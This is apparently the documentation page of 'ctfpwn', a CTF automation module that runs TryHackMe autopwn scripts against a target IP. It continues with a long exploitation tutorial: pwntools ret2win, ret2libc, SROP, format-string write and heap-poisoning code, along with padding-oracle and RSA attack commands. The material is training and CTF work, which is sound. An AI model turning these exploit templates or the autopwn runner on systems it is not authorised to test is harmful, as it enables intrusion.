ctfpwn.

Clones github.com/0xb0rn3/CTFs, lists all rooms sorted newest first, and runs standalone autopwn scripts against a target. Flags are auto-extracted from script output (THM{}, HTB{}, flag{} patterns) and the full run log is saved to ~/ZX01C/CTF/<room>/.

VANTA Module CTF TryHackMe HackTheBox Autopwn Python 3 v0.0.1
CategoryCTF
LanguagePython 3
Locationtools/ctf/ctfpwn/
Authordezthejackal | 0xb0rn3
Versionv0.0.1
LicenseMIT
Beginner Startup
New to VANTA or ctfpwn? Start here.
Foundations guide →
What you need first
  • ▸ A CTF binary or challenge (download from TryHackMe, HackTheBox, pwn.college)
  • pwntools: pip install pwntools
  • gdb-pwndbg: yay -S pwndbg
Your first safe command
set binary ./chall
set operation analyze
run
Operations by difficulty
  • Easy: analyze, checksec, strings_dump
  • Medium: bof_detect, ret2libc, format_string
  • Advanced: rop_chain, heap_exploit, kernel_pwn
Key terms: Buffer Overflow — Writing more data than a buffer can hold, overwriting adjacent memory  ·  ROP Chain — Return-Oriented Programming — chaining existing code gadgets to bypass DEP/NX  ·  PIE — Position Independent Executable — code loads at random address (ASLR for the binary)  ·  checksec — Tool that shows what security mitigations a binary has enabled  — Full glossary →

Overview

What ctfpwn does

ctfpwn is VANTA's CTF automation module. It clones the 0xb0rn3/CTFs repository, mirrors all rooms to ~/ZX01C/CTF/, and runs the standalone autopwn script for any room directly against a target IP. Flag patterns — THM{}, HTB{}, and flag{} — are extracted automatically from script output and printed inline.

Room state is tracked in ~/.vanta/ctfs_state.json so ctfpwn knows exactly which rooms appeared since your last pull. Every run writes a full log to ~/ZX01C/CTF/<room>/run_<timestamp>.log.

Sync
Repo Mirror
Clones github.com/0xb0rn3/CTFs to ~/.vanta/ctfs/ on first run, then pulls on every subsequent call.
Detection
Flag Extraction
Scans all script output for THM{}, HTB{}, and flag{} patterns and prints matches immediately.
State
New Room Tracking
Room state stored in ~/.vanta/ctfs_state.json. Rooms added since last pull are marked in list output.
Logs
Run Logs
Full stdout from every autopwn run saved to ~/ZX01C/CTF/<room>/run_<timestamp>.log for review.
Search
Full-Text Search
Search scans room names, writeup files, and exploit script source. Useful for finding rooms by technique, CVE, or tool name.
Filter
Platform Filter
Filter rooms by platform: THM, HTB, or ALL. Defaults to TryHackMe.

Quick Start

Running ctfpwn

Connect to your platform VPN before running any autopwn script. Then load ctfpwn and pull the latest rooms.

# Pull all rooms on first run
VANTA
vanta ❯ use ctfpwn
VANTA (ctfpwn) ❯ set operation pull
VANTA (ctfpwn) ❯ run none

# List all rooms sorted newest first
VANTA (ctfpwn) ❯ set operation list
VANTA (ctfpwn) ❯ run none

Run a specific room

VANTA (ctfpwn) ❯ set operation run
VANTA (ctfpwn) ❯ set ctf simplectf
VANTA (ctfpwn) ❯ run 10.10.85.42

Run latest room against a target

VANTA (ctfpwn) ❯ set operation latest
VANTA (ctfpwn) ❯ run 10.10.85.42
i Connect to TryHackMe or HackTheBox VPN before running any autopwn script. Scripts reach out to the target IP directly and will fail or hang without an active VPN session.

Reference

Operations

The operation parameter controls what ctfpwn does when run is called.

list default
List all CTFs sorted newest first. Rooms added since the last pull are marked with a new indicator.
pull
Clone the repo on first use or pull updates. Mirrors all room files to ~/ZX01C/CTF/ and updates the state file.
latest
Show the newest CTF room. If a target IP is passed to run, executes that room's autopwn script immediately.
run
Run a specific room's autopwn script against a target IP. Room matched case-insensitively with partial name support.
info
Print the README or writeup for a room. Requires ctf parameter to identify the room.
search
Full-text search across room names, writeup files, and exploit scripts. Requires a query parameter.
shell
Start a reverse shell listener and generate CTF-ready payloads for all common shell types. Set lhost, lport, and payload_type. Uses the revshell module internally.
! The search operation scans room names, writeups, AND exploit scripts. On large repos this can take a few seconds. Results include file paths so you know exactly where a match was found.

Reference

Parameters

ParameterTypeDefaultDescription
operation string list Operation to run: list, pull, latest, run, info, search, or new.
ctf string Room name for run and info operations. Case-insensitive, partial match supported. E.g. simple matches simplectf.
platform string THM Platform filter applied to list, new, and search. Values: THM, HTB, or ALL.
query string Search term for the search operation. Matched against room names, writeup text, and script source.

How It Works

Sync and run workflow

Understanding the pull and run sequence helps when debugging connectivity or stale room state.

Sync workflow

01
Clone or pull
On first run, git clone https://github.com/0xb0rn3/CTFs ~/.vanta/ctfs/. On subsequent pulls, git pull inside the same directory fetches any new commits.
02
Mirror room files
Each room directory from the repo is copied to ~/ZX01C/CTF/<room_name>/. Existing files are overwritten with the latest version from the repo.
03
Update state file
Room list and pull timestamp written to ~/.vanta/ctfs_state.json. The previous state is compared to detect which rooms are new since the last pull.
04
Report new rooms
Rooms that appear in the current state but not the previous state are flagged as new. These show up in list, new, and the pull summary.

Run workflow

01
Resolve room
The ctf parameter is matched case-insensitively against room names in ~/.vanta/ctfs/. Partial matches are accepted — first match wins.
02
Locate autopwn script
ctfpwn looks for the room's standalone script inside the matched directory. Scripts accept the target IP as the first positional argument.
03
Execute and stream output
The script is executed with the target IP: python3 exploit.py <target_ip>. Output is streamed to the terminal in real time while being captured for log and flag extraction.
04
Extract flags and save log
All lines matching THM\{[^}]+\}, HTB\{[^}]+\}, or flag\{[^}]+\} are printed as extracted flags. The full run log is written to ~/ZX01C/CTF/<room>/run_<timestamp>.log.

State file structure

The state file at ~/.vanta/ctfs_state.json records the room list and pull timestamp. The new operation diffs current vs previous state to find additions.

{
  "last_pull":  1746403200,
  "rooms": [
    "Biohazard",
    "AttacktiveDirectory",
    "simplectf",
    "rootmeCTF"
  ]
}

Room List

Available rooms

25 TryHackMe rooms, sorted newest first. HTB rooms are in progress.

TryHackMe (25 rooms)

#RoomPlatform
01BiohazardTHM
02AttacktiveDirectoryTHM
03UltraTechTHM
04BlogTHM
050dayTHM
06DogcatTHM
07GhizerTHM
08RelevantTHM
09WgelTHM
10WonderlandTHM
11Cheese-CTFTHM
12Year of the pigTHM
13Rabbit_StoreTHM
14Silver_PlatterTHM
15crypto_failuresTHM
16sticker_shopTHM
17chill-hackTHM
18W1seGuyTHM
19agent_sudoTHM
20bounty_hackerTHM
21Hidden_Deep_Into_My_HeartTHM
22VulnNet-InternalTHM
23pickle-rickTHM
24simplectfTHM
25rootmeCTFTHM

HackTheBox

Coming soon. Set platform HTB to filter for HTB rooms once available.

Usage

Examples

List all CTFs

vanta ❯ use ctfpwn
VANTA (ctfpwn) ❯ set operation list
VANTA (ctfpwn) ❯ run none

Pull and sync everything

VANTA (ctfpwn) ❯ set operation pull
VANTA (ctfpwn) ❯ run none

# Output
[+] Pulling 0xb0rn3/CTFs ...
[+] Mirrored 25 rooms to ~/ZX01C/CTF/
[+] 2 new rooms since last pull: Biohazard, AttacktiveDirectory

Run latest against a target

VANTA (ctfpwn) ❯ set operation latest
VANTA (ctfpwn) ❯ run 10.10.85.42

# Runs Biohazard autopwn against 10.10.85.42

Run a specific room

VANTA (ctfpwn) ❯ set operation run
VANTA (ctfpwn) ❯ set ctf simplectf
VANTA (ctfpwn) ❯ run 10.10.85.42

# Output
[+] Running simplectf against 10.10.85.42
[+] Flag found: THM{Mg1tsM@g1c}
[+] Log saved: ~/ZX01C/CTF/simplectf/run_1746403200.log

Search by technique

VANTA (ctfpwn) ❯ set operation search
VANTA (ctfpwn) ❯ set query ssti
VANTA (ctfpwn) ❯ run none

# Scans room names, writeups, and exploit scripts for "ssti"

See what is new since last pull

VANTA (ctfpwn) ❯ set operation new
VANTA (ctfpwn) ❯ run none

Read a room's writeup

VANTA (ctfpwn) ❯ set operation info
VANTA (ctfpwn) ❯ set ctf dogcat
VANTA (ctfpwn) ❯ run none

Filter by platform

VANTA (ctfpwn) ❯ set operation list
VANTA (ctfpwn) ❯ set platform ALL
VANTA (ctfpwn) ❯ run none

Dependencies

Required and optional tools

ctfpwn itself only needs Python 3 and git. Individual room scripts may require additional tools depending on the techniques they use.

ToolRequiredUsed for
python3YesRunning ctfpwn and autopwn scripts
gitYesCloning and pulling the CTFs repo
nmapOptionalMost room scripts use nmap for initial port scanning
gobusterOptionalWeb rooms that include directory or vhost brute-forcing
sshpassOptionalPrivesc scripts that automate SSH login with a found credential
hydraOptionalBrute force rooms requiring credential spraying
nodejsOptionalRooms with JavaScript-based exploits

Install required dependencies

# Debian / Ubuntu / Kali
sudo apt install python3 git nmap gobuster sshpass hydra nodejs

# Arch / CachyOS
sudo pacman -S python git nmap gobuster sshpass hydra nodejs

About

Author

0x
dezthejackal | 0xb0rn3
CTF Player · VANTA Developer
CTF write-up author and tool builder. ctfpwn is part of the VANTA offensive security framework, bringing CTF automation into the same modular shell used for network recon, mobile pentesting, and C2 operations. Rooms cover TryHackMe and HackTheBox across web exploitation, privilege escalation, cryptography, and binary challenges.

Binary Exploitation Architecture

What is binary exploitation? Programs compiled from C/C++ run directly on the CPU as machine code. When a programmer makes a mistake — trusting user input for a size, forgetting a null terminator, using a freed pointer — an attacker can feed crafted input that corrupts memory and hijacks the program's execution. Binary exploitation is the art of turning memory corruption bugs into controlled code execution.

CPU registers (x86-64)

General purpose registers (64-bit names, 32-bit in parentheses):
  RAX (EAX) — return value, accumulator
  RBX (EBX) — base, callee-saved
  RCX (ECX) — counter, 4th arg (System V AMD64 ABI)
  RDX (EDX) — data, 3rd arg
  RSI (ESI) — source index, 2nd arg
  RDI (EDI) — destination index, 1st arg
  RBP (EBP) — frame pointer (base of current stack frame)
  RSP (ESP) — stack pointer (top of stack — grows DOWN)
  RIP (EIP) — instruction pointer (next instruction to execute)
  R8–R15     — additional argument/scratch registers

# System V AMD64 calling convention (Linux):
# First 6 args in: RDI, RSI, RDX, RCX, R8, R9
# Return value: RAX
# Stack must be 16-byte aligned before CALL

Stack frame layout

# When function foo() calls bar():
# CALL instruction: pushes RIP (return address) then jumps to bar

High addresses
┌─────────────────────┐  ← caller's frame
│  local vars (foo)   │
│  saved RBP          │  ← foo's frame pointer
│  return addr →foo   │  ← pushed by CALL instruction
├─────────────────────┤  ← bar's frame starts here
│  saved RBP          │  ← PUSH RBP (first instruction of bar)
│                     │  ← RBP now points here
│  local vars (bar)   │
│  [buffer[64]]       │  ← char buf[64] lives here
│                     │
└─────────────────────┘  ← RSP (top of stack)
Low addresses

# Stack grows DOWN: RSP decreases as you push/allocate

# GDB: examine stack
(gdb) x/20xg $rsp    # dump 20 qwords from RSP
(gdb) info frame      # show saved RIP, RBP of current frame

ELF binary format (Linux executables)

ELF Header (64 bytes):
  7F 45 4C 46       # Magic: "\x7fELF"
  02                # EI_CLASS = 2 (64-bit)
  01                # EI_DATA = 1 (little-endian)
  01                # EI_VERSION = 1
  00                # EI_OSABI = 0 (System V)
  [8 bytes padding]
  02 00             # e_type = ET_EXEC (executable) or 03=ET_DYN (PIE)
  3E 00             # e_machine = 0x3E = x86-64
  [entry point, phoff, shoff, flags, header size...]

Key ELF sections:
  .text    — executable code (r-x)
  .data    — initialised global variables (rw-)
  .bss     — uninitialised globals, zeroed at startup (rw-)
  .rodata  — read-only data: string literals (r--)
  .plt     — Procedure Linkage Table: stubs for libc functions
  .got.plt — Global Offset Table: resolved library addresses
  .dynamic — dynamic linking info (NEEDED libraries, etc.)

Binary mitigations (checksec output)

MitigationWhat it doesBypass technique
NX / DEPStack + heap not executable (W^X)ROP — reuse existing code gadgets
ASLRRandomizes stack/heap/library base addressesLeak a pointer, calculate offsets
PIERandomizes the binary's own base addressLeak binary address (format string, partial overwrite)
Stack CanaryRandom value before saved RIP; checked before returnLeak canary (format string), brute force (32-bit)
RELRO (Full)GOT made read-only after startupHarder — need heap/BSS as write target instead
# ctfpwn checksec output:
{
  "nx": true,       # NX enabled — no shellcode on stack
  "pie": true,      # PIE — binary randomized
  "canary": true,   # Stack canary present
  "relro": "full",  # Full RELRO — GOT is read-only
  "arch": "amd64"
}

Buffer Overflow: From Zero to Shell

What is a buffer overflow? A buffer is a region of memory used to store data temporarily. When a program copies input into a fixed-size buffer without checking the input length, you can write past the end of the buffer into adjacent memory — including the saved return address on the stack. By controlling what you write there you control where the program jumps when the function returns.

Vulnerable C code

#include <stdio.h>
#include <string.h>

void vuln() {
    char buf[64];         // 64 bytes on stack
    gets(buf);            // reads until newline — NO LENGTH CHECK
    printf("Hello, %s\n", buf);
}

int main() {
    vuln();
    return 0;
}

# Stack layout in vuln():
# [buf: 64 bytes][saved RBP: 8 bytes][saved RIP: 8 bytes]
# Total to saved RIP: 64 + 8 = 72 bytes
# Send 72 bytes of padding + 8-byte target address → hijack RIP

Finding the offset (ctfpwn bof_detect)

# Method 1: cyclic pattern (pwntools)
from pwn import *
io = process("./vuln")
io.sendline(cyclic(200))
io.wait()
# Read crash: core dump or dmesg
core = Coredump("./core")
offset = cyclic_find(core.fault_addr)
print(f"Offset to RIP: {offset}")

# Method 2: manual binary search
# Send 80 A's, 88 A's, 96 A's — watch when RIP becomes 0x4141414141414141
# Method 3: ctfpwn bof_detect runs automated fuzzing loop

ret2win exploit (no ASLR, no PIE)

from pwn import *

# Target binary has a win() function at 0x401234 that calls system("/bin/sh")
elf = ELF("./vuln")
win_addr = elf.sym["win"]   # or: p64(0x401234)

offset = 72  # bytes until saved RIP

payload  = b"A" * offset    # padding to reach saved RIP
payload += p64(win_addr)    # overwrite RIP with win()'s address

io = process("./vuln")
io.sendline(payload)
io.interactive()             # get the shell

Stack canary bypass via format string leak

# If binary has both a format string bug AND a buffer overflow:
# Step 1: leak the canary with the format string bug
io.sendline(b"%11$p")   # print 11th stack argument (adjust index for binary)
leaked = int(io.recvline(), 16)
canary = leaked
print(f"Canary: {hex(canary)}")

# Step 2: construct overflow with correct canary in place
payload  = b"A" * 64           # fill buffer
payload += p64(canary)         # canary MUST match exactly
payload += p64(0)              # saved RBP (can be anything)
payload += p64(win_addr)       # overwrite RIP

Return-Oriented Programming (ROP)

NX/DEP prevents executing shellcode on the stack. But you can still control execution by chaining gadgets — small sequences of existing code that end with a RET instruction. Each gadget pops the next return address off the stack and jumps there, so your stack payload is a chain of gadget addresses that collectively do something useful.

What is a gadget?

# A gadget is any instruction sequence ending in RET found in the binary or libc
# Examples:
# 0x401234: pop rdi ; ret     ← set RDI (1st argument) to any value
# 0x401238: pop rsi ; ret     ← set RSI (2nd argument)
# 0x401240: pop rdx ; ret     ← set RDX (3rd argument)
# 0x40129a: ret               ← stack alignment gadget (16-byte align for libc)

# Find gadgets:
ROPgadget --binary ./vuln --rop
ropper -f ./vuln
# ctfpwn rop_chain generates candidates automatically

ret2libc chain (calling system("/bin/sh"))

from pwn import *

elf  = ELF("./vuln")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

# Step 1: leak a libc address to defeat ASLR
# Use a puts(got["puts"]) gadget:
rop = ROP(elf)
rop.raw(rop.find_gadget(["pop rdi", "ret"])[0])  # pop rdi ; ret
rop.raw(elf.got["puts"])                          # rdi = GOT address of puts
rop.raw(elf.plt["puts"])                          # call puts(GOT[puts])
rop.raw(elf.sym["main"])                          # return to main for second stage

payload = flat({offset: rop.chain()})
io.sendline(payload)

# Parse leaked address
leaked_puts = u64(io.recvline()[:6].ljust(8, b'\x00'))
libc.address = leaked_puts - libc.sym["puts"]    # calculate libc base

# Step 2: call system("/bin/sh") with known libc base
binsh  = next(libc.search(b"/bin/sh\x00"))
system = libc.sym["system"]

rop2 = ROP([elf, libc])
rop2.raw(rop2.ret.address)                        # alignment gadget
rop2.raw(rop2.find_gadget(["pop rdi", "ret"])[0])
rop2.raw(binsh)
rop2.raw(system)

payload2 = flat({offset: rop2.chain()})
io.sendline(payload2)
io.interactive()

SROP (Sigreturn-Oriented Programming)

# When gadgets are scarce (tiny binary, stripped), use SROP:
# sigreturn syscall (15) restores ALL registers from a sigframe on the stack
# You control the entire CPU state in one gadget

from pwn import *
context.arch = "amd64"

# Build a fake sigframe that sets RIP=system, RDI="/bin/sh", RSP=stack
frame = SigreturnFrame()
frame.rax = 0x3b          # sys_execve
frame.rdi = binsh_addr    # "/bin/sh"
frame.rsi = 0             # argv = NULL
frame.rdx = 0             # envp = NULL
frame.rip = syscall_addr  # syscall ; ret gadget

payload = flat({offset: [syscall_gadget, SigreturnFrame_size, frame]})

Heap Exploitation

The heap is a dynamically allocated memory region managed by ptmalloc2 (glibc's allocator). When a bug lets you read or write out of bounds on a heap chunk, or use memory after it's been freed, you can corrupt allocator metadata and redirect the next malloc() call to return an arbitrary address — giving you a write primitive anywhere in memory.

malloc chunk layout

# Every malloc(n) allocation is a "chunk" with a header:
# (on 64-bit — header is 16 bytes)

Allocated chunk:
  [prev_size: 8B] — only used when prev chunk is FREE
  [size:      8B] — includes flags in low 3 bits
                    bit 0 (P) = previous chunk in use
                    bit 1 (M) = mmapped
                    bit 2 (A) = non-main arena
  [user data: n bytes, padded to 16-byte alignment]

Free chunk (returned to allocator):
  [prev_size: 8B]
  [size:      8B]  (P bit = 0)
  [fd:        8B]  — forward pointer (next free chunk)
  [bk:        8B]  — backward pointer (prev free chunk)
  [... rest of user data space ...]

# The fd/bk pointers in a free chunk are INSIDE the user data region
# → corrupting the user data of a freed chunk corrupts the free list

tcache (glibc 2.26+)

# tcache = per-thread singly-linked free list, one per size class (up to 0x408)
# Each size has a "bin" holding up to 7 freed chunks
# tcache entry: [next: 8B][key: 8B][user data...]
# "next" points to the next free chunk in the bin

# tcache poisoning attack:
# 1. Allocate two same-size chunks: A, B
# 2. Free B, then A (A is now tcache head: A→B→NULL)
# 3. Overflow/UAF to corrupt A's "next" pointer → set to target address
# 4. malloc() returns A (pops from tcache)
# 5. malloc() again → tcache head is now target → returns target address!
# 6. Write to that malloc() return value → arbitrary write

# Example with ctfpwn rop_chain:
# Corrupt tcache next → point to __free_hook or __malloc_hook
# Write system address there → next free(ptr_to_binsh) calls system("/bin/sh")

Use-After-Free (UAF)

# UAF: use a pointer after the memory it pointed to was freed
# If the freed chunk is re-allocated (to a different object), the stale pointer
# now points INTO the new object's data — type confusion attack

struct Obj {
    void (*fn)();   // function pointer at offset 0
    char  data[56]; // data buffer
};

// UAF flow:
Obj *a = malloc(sizeof(Obj));  // allocate
a->fn = legit_function;
free(a);                        // freed — chunk returned to tcache
char *b = malloc(64);           // same size → same chunk returned
memcpy(b, attacker_input, 64); // fill with attacker data
a->fn();  // UAF: a points to freed/reallocated chunk
          // a->fn is now attacker_input[0..7] → arbitrary function call

Format String Exploitation

What is a format string bug? The C function printf(fmt, ...) treats the format string as instructions: %s reads a string pointer from the stack, %d reads an integer, %x reads a hex value. If user input is passed directly as the format string — printf(user_input) instead of printf("%s", user_input) — the attacker controls those instructions.

Reading arbitrary memory

# printf reads arguments off the stack in order.
# If you supply more format specifiers than arguments, it reads whatever's there.
# %N$p reads the Nth argument (stack word) as a pointer.

# Send: "%1$p.%2$p.%3$p.%4$p.%5$p.%6$p.%7$p"
# Output: 0x7fff... (stack addresses), 0x555... (binary addresses), etc.

# Identify canary (usually 0x????..??00 — last byte always 0x00):
# → use it to bypass stack canary in accompanying buffer overflow

# Identify saved RIP → compute PIE/libc offsets → defeat ASLR

# ctfpwn format_string operation:
# Sends probes "%N$p" for N=1..50, parses output, identifies canary + libc base

Writing memory with %n

# %n writes the NUMBER OF BYTES PRINTED SO FAR to the address in the next arg
# This is a write primitive — you can write any 4-byte value anywhere writable

# Write 0x4141 (16705) to address target_addr:
# Step 1: Pad output to 16705 bytes using %16705c (print 16705-wide char)
# Step 2: %N$n — write count to Nth stack argument (which points to target)

from pwn import *
io = process("./vuln")

target = elf.got["puts"]   # overwrite GOT entry for puts → redirect to win()

# %8$n writes to the address at stack arg 8
# Arrange: target address sits at stack position 8 (often after ~48 bytes of input)
fmt  = f"%{win_addr}c%8$n".encode()  # write win_addr's value
fmt  = fmt.ljust(8)                   # align to 8 bytes
fmt += p64(target)                    # address to write to at stack pos 8

io.sendline(fmt)
io.interactive()  # next call to puts() → jumps to win()

Customization & Extension

Adding a custom exploit generator

# tools/ctf/ctfpwn.py — extend with custom exploit template generator

EXPLOIT_TEMPLATES = {
    "ret2win": """from pwn import *
elf = ELF('{binary}')
io = process(elf.path)
win = elf.sym['{win_fn}']
payload = b'A' * {offset} + p64(win)
io.sendline(payload)
io.interactive()
""",
    "ret2libc": """from pwn import *
elf  = ELF('{binary}')
libc = ELF('{libc}')
rop  = ROP(elf)
# Stage 1: leak puts address...
""",
}

def generate_exploit(template_name, **kwargs):
    template = EXPLOIT_TEMPLATES.get(template_name)
    if not template:
        return {"error": f"Unknown template: {template_name}"}
    code = template.format(**kwargs)
    outfile = f"exploit_{template_name}.py"
    with open(outfile, "w") as f:
        f.write(code)
    return {"generated": outfile, "code": code}

Adding a custom binary analyzer

# Add: automatic vuln function detector (grep for dangerous libc calls)
import subprocess, re

DANGEROUS_FUNCTIONS = [
    "gets", "strcpy", "strcat", "sprintf", "scanf",
    "vsprintf", "memcpy",  # check if size is user-controlled
    "system",              # if reachable, it's a win condition
]

def find_dangerous_calls(binary_path):
    result = subprocess.run(
        ["objdump", "-d", binary_path],
        capture_output=True, text=True
    )
    findings = []
    for fn in DANGEROUS_FUNCTIONS:
        pattern = re.compile(rf'call.*<{fn}')
        matches = pattern.findall(result.stdout)
        if matches:
            findings.append({"function": fn, "calls": len(matches)})
    return {"dangerous_calls": findings}

# Register as ctfpwn operation:
# { "name": "vuln_scan", "description": "Detect dangerous libc call sites" }

Extending the ROP chain finder

# ctfpwn rop_chain already runs ROPgadget — extend it to auto-suggest chains

from pwn import ROP, ELF

def suggest_rop_chain(binary_path):
    elf = ELF(binary_path)
    rop = ROP(elf)
    suggestions = []

    # Try ret2win
    for sym in ["win", "shell", "flag", "backdoor", "get_flag"]:
        if sym in elf.sym:
            suggestions.append({
                "type": "ret2win",
                "target": sym,
                "address": hex(elf.sym[sym])
            })

    # Check for system@plt
    if "system" in elf.plt:
        suggestions.append({
            "type": "ret2plt_system",
            "note": "system@plt found — pair with /bin/sh string and pop rdi gadget"
        })

    # Check for syscall gadget (for SROP)
    try:
        syscall = rop.find_gadget(["syscall", "ret"])
        if syscall:
            suggestions.append({"type": "srop_candidate",
                                 "syscall_gadget": hex(syscall.address)})
    except Exception:
        pass

    return {"suggestions": suggestions}

Learning Path

Recommended resources (free first)

ResourceFormatFocus
pwn.collegeFree interactive courseBinary exploitation from first principles — ASU curriculum
exploit.educationFree VMsPhoenix/Protostar challenges (stack, heap, format string)
CTFtime.orgEvent listingFind live CTFs by difficulty, category
TryHackMe — Heap ExploitationGuided labtcache, fastbin, house-of-force
pwntools docsReferenceComplete API for ELF, ROP, tubes, cyclic
Hacking: The Art of Exploitation — Jon EricksonBookx86 ASM, stack overflows, shellcoding from scratch
ROP EmporiumFree challenges8 progressive ROP exercises (ret2win → SROP)
how2heapCode + explanationEvery heap technique with working PoC (tcache, fastbin, etc.)

Practice progression (10 weeks)

Week 1 — Assembly and memory
  ▸ pwn.college: Assembly Crash Course module
  ▸ Write "hello world" in nasm x86-64 assembly, compile, run
  ▸ GDB basics: break, run, x/20xg $rsp, info registers

Week 2 — Stack overflows (no mitigations)
  ▸ exploit.education: Protostar stack0–stack6
  ▸ ctfpwn analyze + bof_detect on each binary
  ▸ pwn.college: Program Interaction module

Week 3 — ret2win and shellcode
  ▸ ROP Emporium: ret2win (x86 and x86-64)
  ▸ Write 24-byte shellcode: execve("/bin/sh", NULL, NULL)
  ▸ pwn.college: Shellcode Injection module

Week 4 — Defeating NX: ROP chains
  ▸ ROP Emporium: split → callme → write4 → badchars
  ▸ Learn ROPgadget and ropper
  ▸ Build a ret2libc chain manually (no pwntools helpers)

Week 5 — ASLR + PIE bypass
  ▸ ROP Emporium: fluff → pivot → ret2csu
  ▸ Practice: leak GOT entry → compute libc base → ret2system
  ▸ ctfpwn rop_chain on a PIE binary

Week 6 — Stack canary bypass
  ▸ Format string leak + overflow combo
  ▸ exploit.education: Format String challenges
  ▸ ctfpwn format_string on a test binary

Week 7 — Heap fundamentals
  ▸ how2heap: tcache_poisoning, fastbin_dup
  ▸ TryHackMe: Heap Exploitation room
  ▸ ctfpwn heap_exploit on a test program

Week 8 — CTF practice
  ▸ CTFtime.org — join a beginner CTF (picoCTF, HSCTF)
  ▸ Solve at least 3 pwn challenges
  ▸ Read writeups for challenges you couldn't solve

Week 9 — Kernel basics
  ▸ pwn.college: Kernel Exploitation module (intro)
  ▸ Learn: kernel module structure, syscall table, ret2user

Week 10 — Competition readiness
  ▸ Set up a fast environment: pwndbg + pwntools + tmux
  ▸ Build a challenge template (ctfpwn generate or your own)
  ▸ Join a real CTF team on CTFtime.org

Essential tools

ToolPurposeInstall
pwntoolsExploit scripting: ELF, ROP, tubes, cyclicpip install pwntools
pwndbgGDB plugin: heap vis, ROP search, contextyay -S pwndbg
ROPgadgetFind ROP gadgets in binariespip install ROPGadget
ropperAlternative gadget finder with filteringpip install ropper
GhidraNSA decompiler — C pseudocode from binaryghidra-sre.org (free)
checksecBinary mitigation summaryincluded with pwntools
one_gadgetFind one-shot execve gadgets in libcgem install one_gadget

L1 Buffer Overflow From Scratch

What is the Stack, What is a Buffer, and Why It Overflows

A buffer overflow is one of the oldest and most fundamental vulnerability classes in software security. It occurs when a program writes more data into a fixed-size memory region (buffer) than that region can hold, overwriting adjacent memory. On the stack, the memory adjacent to local variable buffers includes the saved return address - the location the function will jump to when it returns. Overwriting the return address lets you control where execution goes.

The Stack Layout
The stack grows downward in memory (toward lower addresses). When a function is called: the arguments are pushed first, then the return address (EIP/RIP), then the saved base pointer (EBP/RBP), then space for local variables. If a local variable is a char array and you write too many bytes into it, you overwrite EBP and then the return address sitting just above it in memory.
Finding the Offset
You need to know exactly how many bytes to write before reaching the return address. Use pattern_create (Metasploit) or cyclic (pwntools) to generate a non-repeating pattern. Send it as input, wait for the crash, then read the value in EIP - pattern_offset or cyclic_find tells you the exact offset. This is the number of bytes of padding you need before writing your controlled return address.
ret2libc
Modern systems use NX (No-Execute) which prevents running shellcode on the stack. ret2libc bypasses NX by returning into existing code in libc rather than custom shellcode. Overwrite the return address with the address of system() in libc, then place the address of the string "/bin/sh" as the argument. No new code executed - you just redirect execution to existing trusted functions.
Protections to Know
ASLR (Address Space Layout Randomization): randomizes where the stack, heap, and libraries load. Bypass with an info leak or brute-force (32-bit). Stack Canary: a random value placed between the buffer and return address - the program checks it before returning; if changed, it crashes. Bypass requires leaking the canary value first. PIE: randomizes the binary's own base address. Check protections with checksec binary.
# Generate a cyclic pattern to find the offset (pwntools)
python3 -c "from pwn import *; print(cyclic(200))" | ./vulnerable_binary

# After crash, find offset from EIP value
python3 -c "from pwn import *; print(cyclic_find(0x61616161))"
  # 0x61616161 is the value found in EIP register after the crash

# Basic 32-bit BOF exploit template
from pwn import *

offset = 76         # bytes until EIP overwrite
ret_addr = 0x080491b6    # address of win() function from objdump/GDB

payload = b'A' * offset
payload += p32(ret_addr)   # little-endian packed address

p = process('./vuln')
p.sendline(payload)
p.interactive()

# Check binary protections
checksec ./vulnerable_binary
  # shows: NX, PIE, Stack Canary, RELRO status

Recognizing and Breaking Common Crypto Challenges

CTF crypto challenges test your ability to identify a cipher type from ciphertext characteristics, recognize implementation weaknesses, and apply the correct mathematical attack. You rarely need to implement attacks from scratch - libraries and tools exist for most classic attacks. The skill is knowing which attack applies to which scenario.

XOR with Short Key
XOR with a repeating short key (Vigenere-style) is broken by frequency analysis. The key length can be found by computing the Index of Coincidence or using the Kasiski test. Once you know the key length, each position is a simple Caesar cipher solvable by frequency. Tool: xortool automates this. Recognizer: XOR ciphertext has high byte frequency variance.
RSA with Small e
If RSA exponent e is small (e=3) and the plaintext m is also small, then c = m^e mod n may equal m^e without any modular reduction. Take the integer cube root of c to get m directly. Coppersmith's attack generalizes this for larger plaintexts. Tool: RsaCtfTool.py automates many RSA weaknesses.
CBC Padding Oracle
In CBC mode, each block is XOR'd with the previous ciphertext block before decryption. If the server reveals whether decryption produced valid PKCS7 padding (even via error message or response time), you can recover plaintext one byte at a time without the key. Requires about 128 requests per byte. Tool: PadBuster, padbuster.py.
Recognizing Cipher Types
Base64 ends with = padding and uses A-Za-z0-9+/. Hex is 0-9A-F. A fixed-length ciphertext suggests a block cipher (AES block = 16 bytes). Ciphertext same length as plaintext suggests a stream cipher or XOR. Ciphertext in groups of two large numbers suggests RSA or elliptic curve. CyberChef's "magic" function auto-detects many encodings.
Common Number Theory Attacks
Wiener's attack: RSA with very large d (private exponent) relative to n is vulnerable. Fermat's factorization: if p and q are close together, n can be factored quickly. Chinese Remainder Theorem (CRT) with same plaintext encrypted under multiple public keys: Hastad's broadcast attack recovers the plaintext directly.
Hash Weaknesses
Length extension attack: SHA-1, SHA-256, and MD5 are vulnerable when you know H(secret + message) and want to compute H(secret + message + extension) without knowing the secret. Tool: hashpump. MD5 collisions: two different inputs producing the same MD5 hash are computationally feasible. Use hashclash or pre-computed collision pairs from the literature.
# XOR key length detection with xortool
xortool ciphertext.bin
  # tries key lengths 1-32, estimates based on character frequencies

# RSA small e attack with RsaCtfTool
python3 RsaCtfTool.py --publickey pubkey.pem --uncipher ciphertext.bin

# CBC padding oracle with PadBuster
padbuster http://target/decrypt.php?cipher=CIPHERTEXT CIPHERTEXT 16
  # 16 = AES block size in bytes

# Convert various encoding types (CyberChef equivalent in CLI)
python3 -c "import base64; print(base64.b64decode('SGVsbG8='))"
python3 -c "print(bytes.fromhex('48656c6c6f'))"

# Factor n with Fermat's method (when p and q are close)
from sympy import nextprime, isqrt
def fermat_factor(n):
    a = isqrt(n) + 1
    b2 = a*a - n
    while isqrt(b2)**2 != b2:
        a += 1; b2 = a*a - n
    return a - isqrt(b2), a + isqrt(b2)

Finding Information That Was Never Meant to Be Public

OSINT (Open Source Intelligence) is the practice of collecting information from publicly available sources. In CTFs, OSINT challenges test your ability to find information that is technically public but not easily discoverable. In real pentests, OSINT is the reconnaissance phase - gathering target information before any active scanning. No packets are sent to the target during OSINT.

Username Enumeration
